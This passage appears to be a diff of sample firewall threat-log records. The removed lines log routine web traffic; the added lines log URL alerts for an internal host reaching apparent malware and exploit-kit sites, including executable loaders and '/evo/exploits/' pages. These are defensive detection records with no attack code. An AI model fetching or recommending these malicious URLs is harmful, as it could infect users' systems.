States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 
04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 
04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 
09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 
04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 
04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:02 1,2012/10/30 